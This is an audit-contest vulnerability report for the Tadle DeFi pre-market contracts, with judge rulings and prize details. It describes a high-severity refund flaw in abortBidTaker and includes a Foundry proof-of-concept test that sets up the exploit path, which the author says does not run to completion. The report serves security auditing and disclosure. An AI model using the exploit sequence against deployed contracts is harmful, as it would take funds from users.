Tadle

DeFi

30,000 USDC

View results

Previous Next

Submission Details

Severity: high

Valid

Takers who listed make huge profit on aborted offers.

_frolic

Summary

Takers who listed offers make huge profits when the offer is aborted in turbo mode.

Vulnerability Details

When an offer is aborted by calling Premarktes::abortAskOfffer in turbo mode, the offer owner collateral is refunded, the takers under the offer can then call Premarktes::abortBidTaker to get back their tokens. If a taker has listed their stock and has takers under it, the Premarktes::abortBidTaker function still refunds them their initial deposit.

Impact

The taker who listed his stock receives a full refund of his tokens plus the tokens paid to him by the takers matched to his offer.

POC

function test_abort_turbo_2_offer() public {

vm.startPrank(user);

preMarktes.createOffer(

CreateOfferParams(

marketPlace,

address(mockUSDCToken),

1000,

0.01 * 1e18,

12000,

300,

OfferType.Ask,

OfferSettleType.Turbo

)

);

vm.stopPrank();

vm.startPrank(user1);

mockUSDCToken.approve(address(tokenManager), type(uint256).max);

address stockAddr = GenerateAddress.generateStockAddress(0);

address offerAddr = GenerateAddress.generateOfferAddress(0);

preMarktes.createTaker(offerAddr, 500);

vm.stopPrank();

address stock1Addr = GenerateAddress.generateStockAddress(1);

vm.startPrank(user4);

preMarktes.createTaker(offerAddr, 500);// user4 matches user offer

address stock2Addr = GenerateAddress.generateStockAddress(2);

preMarktes.listOffer(stock2Addr, 0.015 * 1e18, 12000); //user4 lists his stock

address offer1Addr = GenerateAddress.generateOfferAddress(2);

vm.startPrank(user1);

mockUSDCToken.approve(address(tokenManager), type(uint256).max);

preMarktes.createTaker(offer1Addr, 250); //matches user4 listed stock

vm.stopPrank();

vm.prank(user);

preMarktes.abortAskOffer(stockAddr, offerAddr);

vm.startPrank(user1);

preMarktes.abortBidTaker(stock1Addr, offerAddr);

vm.stopPrank();

vm.startPrank(user4);

preMarktes.abortBidTaker(stock2Addr, offerAddr);

//user4 gets back his initial tokens(tokens paid to user) + tokens paid to him by user1

//when he matched his order.

vm.stopPrank();

}

Note: The POC does not show results due to an error in the abortBidTaker function.

Tools Used

Manual Analysis

Recommendations

Add a check for stockInfo.offer in the Premarktes::abortBidTaker function so as to know if a stock is listed and calculate the refunded amount accordingly.

Updates

Lead Judging Commences

0xnevi Lead Judge

10 months ago

0xnevi Lead Judge 10 months ago

Submission Judgement Published

Invalidated

Reason: Too generic

Appeal created

_frolic Submitter

10 months ago

_frolic Submitter

10 months ago

0xnevi Lead Judge

10 months ago

0xnevi Lead Judge 10 months ago

Submission Judgement Published

Validated

Assigned finding tags:

finding-PreMarkets-immediate-withdrawal-allow-maker-steal-funds

Valid high severity, given orginal offer makers are not a trusted entity to enforce a settlement. The trade tax set by the maker should be returned back to the takers to avoid abuse of abortion of ask offers to steal trade tax from takers. Note for appeals period: See issue #528 for additional details

Prize pool breakdown

Total prize

30,000 USDC

nSLOC

1,229

24 USDC / LOC

High Medium

25,000 USDC

Low

2,750 USDC

Judges

2,250 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.